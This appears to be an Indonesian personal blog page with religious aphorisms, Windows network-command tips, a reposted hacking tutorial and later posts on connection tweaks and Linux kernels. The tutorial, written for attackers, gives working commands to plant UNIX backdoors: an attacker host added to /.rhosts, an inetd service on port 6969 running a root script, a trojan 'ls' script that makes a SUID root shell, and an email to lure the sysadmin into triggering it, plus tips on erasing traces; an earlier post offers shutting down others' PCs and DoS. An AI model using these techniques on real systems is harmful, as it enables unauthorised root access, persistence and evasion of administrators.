"ACOM" Alfa Century Multy Science Plus

"ANCAMAN NYATA SEBENARNYA BUKAN SAAT KOMPUTER MULAI BERFIKIR SEPERTI MANUSIA, tetapi KETIKA MANUSIA MULAI BERFIKIR SEPERTI KOMPUTER"

"MEMBERI SESEORANG IKAN ENGKAU MEMBERINYA MAKAN SEHARI, TAPI MENGAJARINYA MENGAIL ENGKAU MEMBERINYA MAKAN SEUMUR HIDUP"
"Jasad boleh terhempas dan terjungkil, tetapi jiwa dan ruhul jihad tidak boleh binasa. Pemikir dan mujahid ilmu tidak boleh ragu dan gugup menghadapi tantangan. ia harus tenang, tabah dan pandai menyelematkan diri, mengendalikan jalannya perjuangan dan mengembangkan harapan. bila kebenaran telah tiba, kebatilan akan musnah | Semua manusia akan mati, kecuali yang berilmu. semua yang berilmu akan tidur kecuali yang mengamalkan ilmunya | Pengetahuan adalah warisan yang mulia, budi pekerti ibarat pakaian yang baru dan pikiran ibarat cermin yang bening (jernih). | Seekor burung hantu yang bijaksana duduk di sebatang dahan. Semakin banyak ia melihat, semakin sedikit ia berbicara. Semakin sedikit ia bicara, semakin banyak ia mendengar. Mengapa kita tidak seperti burung hantu yg bijaksana itu?. | Kesakitan membuat Anda berpikir. Pikiran membuat Anda bijaksana. Kebijaksanaan membuat kita bisa bertahan dalam hidup | Kita tidak akan sanggup mengekang amarah dan hawa nafsu secara keseluruhan hingga tidak meninggalkan bekas apapun dalam diri kita. Namun jika mencoba untuk mengendalikan keduanya dengan cara latihan dan kesungguhan yang kuat, tentu kita akan bisa"
LA TAHZANU
Jangan Bersedih,Duhai kekasih,Daku pahami hatimu yg perih,Hadapilah dgn jernih,Berhentilah merintih-rintih,Pandangilah luasnya bumi,Serta cerahnya matahari, ALLAH selalu merahmati, Burungpun turut menari-nari. kUKAGUMI pARAS cANTIKMU, kURASAKAN tULUS hATIMU, aWAN yANG GELAP aKAN BERLALU, lANGIT hIDUPMU cERAH MEMBIRU
MA'RIFAT
Akeh wong iku podo bingung kejobo wong duwe ilmu,wong duwe ilmu iku ugo bingung kejobo wong ikhlas,wong ikhlas iku ugo isih bingung kejobo wes mlebu suwargo,wong kang wes mlebu suwargo ugo bingung kejobo wong kang ketemu wujude gusti kang akaryo jagat.
TAWADHU'
“AWAKMU DHUDU OPO-OPO, AWAKMU ORA BISO OPO-OPO, AWAKMU ORA DUWE OPO-OPO” (DIRI KITA BUKAN APA-APA, DIRI KITA TAK BISA APA-APA, DIRI KITA TAK PUNYA APA-APA)
“KALAU KETEMU ORANG TUA, MERASALAH ORANG TUA ITU LEBIH BAIK KETIMBANG DIRIMU, SEBAB ORANG TUA ITU IBADAHNYA MESTI LEBIH BANYAK KETIMBANG KITA”
“KALAU KETEMU ORANG MUDA, MERASALAH ORANG MUDA LEBIH BAGUS KETIMBANG KITA, SEBAB ORANG MUDA JK MELAKUKAN MAKSIAT PASTI LEBIH SEDIKIT KETIMBANG KITA”
“KALAU KETEMU ORANG ALIM, MERASALAH IA LEBIH BAGUS KETIMBANG KITA SEBAB JIKA IA BERIBADAH DAN BERAMAL PASTI DGN ILMUNYA“
“KALAU KETEMU ORANG BODOH, MERASALAH ORANG BODOH ITU LEBIH BAIK KETIMBANG DIRIMU, SEBAB IA ITU JK MELAKUKAN DOSA PASTI TIDAK TAHU, KALAU PERBUATAN YG DILAKUKAN TIDAK TAHU PASTI TAK KENA HUKUM FIQHNYA”
“KALAU KETEMU ORANG KAYA, MERASALAH ORANG KAYA ITU LEBIH BAGUS KETIMBANG KITA, SEBAB JK IA BERAMAL SHODAQOH PASTI AMALANNYA LEBIH BANYAK KETIMBANG KITA”
“KALAU KETEMU ORANG MISKIN, MERASALAH ORANG MISKIN ITU LEBIH BAGUS KETIMBANG KITA, SEBAB ORANG FAKIR DAN MISKIN ITU LEBIH BANYAK MEMERANGI HAWA NAFSUNYA”
“ORANG FAKIR YG SABAR LEBIH BAGUS KETIMBANG ORANG KAYA YG BANYAK SYUKURNYA”
“KALAU KETEMU BINATANG (SEPERTI ANJING), MERASALAH ANJING ITU LEBIH BAGUS KETIMBANG KITA, SEBAB MAKLHUK INI (BINATANG) TIDAK ADA PERTANGGUNGJAWABAN JK IA MATI”
kalau ketemu orang KAFIR, merasalah orang kafir itu lebih BAGUS ketimbang kita, sebab siapa tahu waktu ia mau meninggal dan hidayah ALLOH diterimannya lalu dia masuk Islam maka dosa-dosanya terhapus semuanya, dan pasti masuk surga. sedang kita tidak tahu apakah kita nanti MATI tetap membawa iman dan islam atau sebaliknya...., naudzubillah..., ya muqollibal qulub tsabit qolbi 'alaa dinnih.
TASAWUF
ojo demen-demen marang ndunyo, nanging demeno marang kang nggawe ndunyo. lan ojo gething marang ndunyo, sebab neng kono ono kang nggawe ndunyo.
Jangan terlalu mencintai dunia, namun cintailah kepada yang membuat dunia. dan jangan membenci dunia, sebab disitu ada yang membuat dunia.
LOGICAL BASIC
A = B dan B = C maka A = C
TETESAN EMBUN PAGI
agama ISLAm itu adalah agama yg lengkap dan canggih, sekaligus sangat sederhana dan realistis, gampang dan mudah dicerna dan juga tidak dogmatis, menolak segala yg berbau tahayul, khurofat, fiodalisme, taqlit buta, mistik maupun keberhalaan (idoltery) dalam berbagai bentuknya, maka sudah semestinya UMADnya harus handal dan canggih (SOPISTICATED)"
JADILAH ORANG BIASA NAMUN MEMILIKI PEMIKIRAN DAN KEMAMPUAN YANG LUAR BIASA"
Tak ada yang salah dengan semua yang serba sederhana kita fahami dalam hidup ini, namun yg pasti, semua yang NAMPAK percuma sebenarnya BERMAKNA"
Dengan sangat sederhana kebanyakan para ilmuwan dunia memahami ciptaan TUHAN yang tidak sederhana. Sehingga teori-teori yang dihasilkan hanya sebuah illusi keterbatasan dimensi yang sangat prematur karena dibenturkan kosmonitas verbal pola pikir logika semata. Apalagi ia berfikir tetang penciptaan dengan tidak percaya adanya TUHAN. Sangat IRONI
TRIK LOOKING IP ADDRESS
Senin, 25 Januari 2010
Cara buat lihat ip address dan serba serbi nya
1. ke command (start,run,ketik cmd) --> win xp, kalau 98 (ketik command)
2. ketik ipconfig (kelihatan IP na de)
3. nbtstat -a --> untuk melihat nama pemakai ip
contoh : nbtstat -a 192.168.0.2
4. netstat 10 --> untuk melihat daftar jaringan nya (ke mana aja connect nya)
5. net view / net user -> untuk melihat user di jaringan kita
6. Shutdown -i -> untuk menshutdown pc orang lain

sekian dulu kk, thx

khusus shutdown itu perintah di bawah windows xp, alias 9x,2k masih bisa.
kalo di xp sp 2 sudah ga bisa,karena ada firewall (kecuali fire wall nya di mattiin). Cara lain nya, adalah dengan denial attack / dos. Ada yang berniat untuk dijelaskan trik nya??
tulisan ini ditujukan untuk memandu mereka yang masih bingung dengan terminologi sekuritas jaringan komputer seperti exploit,
trojan, dll dan ingin mengetahui konsep-konsep dasarnya.


EXPLOITS
Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang baru kamu 'dapatkan'.
Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalam konteks per-hacking-an,
eksploit tidaklah jauh berbeda dengan artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih
spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar
dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh
pemrogram asli, dan lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita akses
tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploit program anu untuk mendapat
privilese root'. Tentu saja mendapatkan 'root' bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah
alami sendiri, kadang sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan 'header forging',
'ip spoofing', 'denial of service attack', dan 'mail bombing'.

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote. Eksploit lokal adalah jenis eksploit yang
hanya bisa dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini
jumlahnya banyak, sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh dari
eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana dua proses saling berlomba
untuk menyelesaikan tugas masing-masing, biasanya proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese
root temporer sementara proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user biasa,
mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya
bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program
sampai berhasil kamu jebol (lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram
dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak eksploit yang sudah didokumentasi.

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum. Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com/. Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campur tangan dari user lokal untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke alamat email tertentu.)

BACKDOOR
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya,
dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di
keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih
jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan
jika kamu mempunyai perizinan root. Ingat, bahwa tujuan membuat backdoor bukanlah untuk
mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin
menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file
/etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.
Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin,
sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan
privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:

korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari
file /etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.
Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun
kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan
shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masala
h ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang s
ysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan
merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":

root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban
# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo
"echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat,
namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untukmenghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke file .rhosts milik root. Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap system target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

dan, BOOM!

korban#

shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent...engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan anti deteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca tulisan kelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah hasil karangan kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker FBI telah berhasil memodifikasi program
sendmail di server korban.com (tembakan pestol efbiay!):

212@GG> telnet korban.com
25 Trying mesin.korban.com
Connected to mesin.korban.com
Escape character is '^]'.
220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5
[snip]
PSM_EXEC /bin/cp /bin/sh /tmp/elit
Done ... master! PSM_EXEC /bin/chmod 4755 /tmp/elit
Done ... master!
Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan hati
minta izin untuk berguru!



TROJAN HORSE
Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa sehingga saat sang sysadmin menjalankan program tersebut, tanpa disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip tersebut tanpa menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan akses tak berpassword kepada sang penulis asli skrip.


TRAPDOOR
Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini, 'Trapdoor' diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang paling gres, atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak berjalan sama sekali (patched systems). Jangan putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang sysadmin tertipu, berakibat dibukanya akses ke dalam system. Misalkan kamu sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor. Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang accountnya kamu 'pinjam'):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke root jika beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letak kelemahan UNIX dibanding ... uh, MS-DOS. Dalam UNIX, seorang sysadmin yang baik selalu mengetik 'full pathname' dari program manapun yang dia jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftar search path. Jadi jika misalnya sang sysadmin melakukan:

root# pwd
/usr/home/staff/user1
root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh ... cukup menarik, khan. Nah, sekarang kita bisa buat sebuah skrip yang berisi:

#!/bin/sh cp /bin/sh /tmp/vi-save-902887
chown root /tmp/vi-save-902887
chmod 4755 /tmp/vi-save-902887
rm ./ls
ls
simpan skrip tersebut di homedir user1, beri nama "ls" dan
user1@korban> chmod +x ls
sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa saja 'mengundang' sang admin. Login sebagai user1, dan kirim email

user1@korban> mail root@localhost
Subject: "Heheheh ... Kena garap dari belakang!"
Hello sysadmin tolol! Mesin kamu sudah kebobolan!
ttd, God of All Hackers, Virus Researchers and Lame Mailbombers,
Phardera .

Saat menerima email ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu kemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh ...


kok malah kelinux y,ya udh selamat belajar linux y.....,
biasanya anti virus sekarang udh dilengkapi dengan firewall untuk mencegah pc lain masuk kedalam jaringan data pc kita,kamu bisa mengaktifkan firewall anti virus tsb.dan untuk lebih aman nya file-file penting yng di sharring dalam jaringan diberi pasword,untuk mencegah pengambilan data yng tidak diketahui..







posted by ACOM (linuxinuse) @ 00.05   0 comments
PERCEPAT SMART MODEM SUSULAN
Minggu, 24 Januari 2010
  • Setting Komputer / Widows Settingan ini merupakan settingan secara umum untuk semua koneksi internet, yaitu seeting Qos Packet Scheduler dan TCP/IP. Jika menggunakan Qos Packet Sceduler silahkan ketik di menu 'Run' (gpedit.msc) -- > Masuk Computer Configuration --> Administrative Templates --> Network --> Qos Packet Scheduler. Rubah Limit Outstanding Packets dari 'not configured' menjadi 'enabled dan Bandwidth Limit' (%) = 0.

    Hal ini akan menghemat bandwidth kita 20% yang dipakai oleh Microsoft. Pada TCP/IP bisa kita set services pada regedit dengan cara ketik 'REGEDIT' pada 'Run', pada HKLM\system\CurrentControlSet\Services\Tcpip\parameters dan edit value register pada
    • DefaultTTL isi value 00000040
    • EnablePMTUBHDetect isi value 00000000
    • EnablePMTUDiscovery isi value 00000001
    • GlobalMaxTcpWindowSize isi value 0005ae4c
    • SackOpts isi value 00000001
    • Tcp1323Opts isi value 00000003
    • TcpWindowSize isi value 0005ae4c
    • Restart PC

  • Instal Tweak. Tweak Pengaturan ekstensi ini juga kompatibel dengan rilis Mozzila Firefox 3.0 terbaru disini: Setelah terinstal, Buka pada Firefox: Tool --> Tweak Network setting --> Isikan data sbb:
    • Max connection –> 40
    • Max connection per server –> 16
    • Max persistent connection per server –> 16
    • Max persistent connection per proxy –> 16
    • Berikan tanda centhang pada --> 'Pipelining' & 'Proxy pipelining'
    • Pepilening max request –> 8

  • Mengaktifkan pipelining
    • Ketik 'about:config' kemudian tekan [Enter] di address bar Fierefox,
    • Double klik network.http.pipelining dan network.http.proxy.pipelining sehingga nilainya menjadi true.
    • Kemudian klik dua kali network.http.pipelining.maxrequests dan masukkan angka 8, kemudian klik tombol OK.

  • Loading lebih cepat
    • Ketik 'about:config' kemudian tekan [Enter] di address bar Fierefox
    • Kemudian klik kanan di jendela tersebut, kemudian pilih New --> integer. kemudian ketik 'content.switch.threshold' klik OK, masukkan angka 250000 (seperempat detik) dan klik OK.

  • Tidak ada interupsi
    • Ketik 'about:config' kemudian tekan [Enter] di address bar Fierefox
    • Kemudian klik kanan di jendela tersebut, kemudian pilih New --> Boolean. Kemudian ketik 'content.interrupt.parsing' Klik 'True'

  • Blokir Flash / iklan
    • Downloads add-ons Flashblock extension disini
    • Instal Add-ons
    • Re-start Firefox

  • Instal Fasterfox Add-ons yang sudah kompitabel dengan Firefox 3.5 disini
  • Instal Juga IDM (Internet Downloads Manager) untuk downloads lebih cepat.

  • posted by ACOM (linuxinuse) @ 22.04   0 comments
    MEMAHAMI DISTRO LINUX
    Selasa, 12 Januari 2010
    MEMAHAMI DISTRO LINUX
    Perbedaan Kernell Linux dan Windows


    Secara umum kernel itu fungsinya me-manage resource yang ada di komp dan me-manage semua proses. kernel adalah suatu perangkat lunak yang menjadi bagian utama dari sebuah sistem operasi .Tugasnya melayani bermacam program aplikasi untuk mengakses perangkat keras komputer secara aman.

    Kernel monolitik mengintegrasikan banyak fungsi di dalam kernel dan menyediakan lapisan abstraksi perangkat keras secara penuh terhadap perangkat keras yang berada di bawah sistem operasi.
    Di bawah ini ada beberapa sistem operasi yang menggunakan Monolithic kernel:
    Kernel sistem operasi UNIX tradisional, seperti halnya kernel dari sistem operasi UNIX keluarga BSD (NetBSD, BSD/I, FreeBSD, dan lainnya).
    Kernel sistem operasi GNU/Linux, Linux.
    Kernel sistem operasi Windows (versi 1.x hingga 4.x; kecuali Windows NT).
    linux :

    Open source code kernelna / kodenya dibuka,Linux memiliki kernel yang stabil. Dia dapat berjalan 24 jam sehari 7 hari seminggu tanpa harus restart. Ini yang membuat Linux menjadi unggul jika dibandingkan dengan MS Windows yang kadang minimal dalam satu hari kita harus me-restart ulang untuk menyegarkannya.
    Kernel Linux memiliki interface untuk mengakses sistem, library, dan user interface. Interface untuk sistem berperan penting karena secara umum bertanggung jawab atas proses-proses. Melalui sebuah perintah khusus proses diganti dari mode pengguna ke mode kernel.
    Seperti dalam Windows, kernel bekerjasama dengan perangkat I/O dan menangani pengelolaan kapasitas. Bagian yang besar mengurusi manajemen proses, memilih tugas mana yang menjadi prioritas, dan mendapatkan giliran yang mana yang harus dikerjakan. Untuk itu, pada level terbawah terdapat fungsi-fungsi untuk mengendalikan interupsi.
    Kernel Linux pada mulanya ditulis sebagai hobi oleh pelajar universitas Finland Linus Torvalds yang belajar di Universitas Helsinki, untuk membuat kernel Minix yang bebas dan dapat sunting. (Minix adalah projek pelajaran menyerupai UNIX direka untuk mudah dan bukannya untuk kegunaan perniagaan.) Versi 0.01 dikeluarkan ke Internet pada September 1991, Versi 0.02 pada 5 Oktober 1991.

    windows :
    Kernelnya bersifat close source / kodenya ditutup,kernel windows...itu adalah bagian dalam dari sistem operasi windows seperti registry, library nya..kita hanya bisa mengedit sedikit saja tidak bisa dalam seperti nix..makanya disebut sebagai sistem cathedral..tidak seperti opensources

    Hal ini bertujuan untuk menjadi yang paling komprehensif kernel1, 2 perbandingan terbaru gaya Unix yang paling populer versus kernel terbaru kernel yang paling populer. Saat ini adalah kernel 2.6.28 Linux dan Windows Vista SP1 kernel. Datang di 2009 adalah 2.6.29 versus Windows Vista SP1.

    Pada Windows kernel ditangani oleh file kernel32.dll. Kernel ini menangani manajemen memori operasi masukan / keluaran dan interrupt. Ketika boot Windows, kernel32.dll di-load ke dalam spasi protected memory sehingga spasi memorinya tidak digunakan oleh aplikasi lain. Apabila ada aplikasi yang mencoba mengambil spasi memori kernel32.dll, akan muncul pesan kesalahan "invalid page fault".
    GNOME

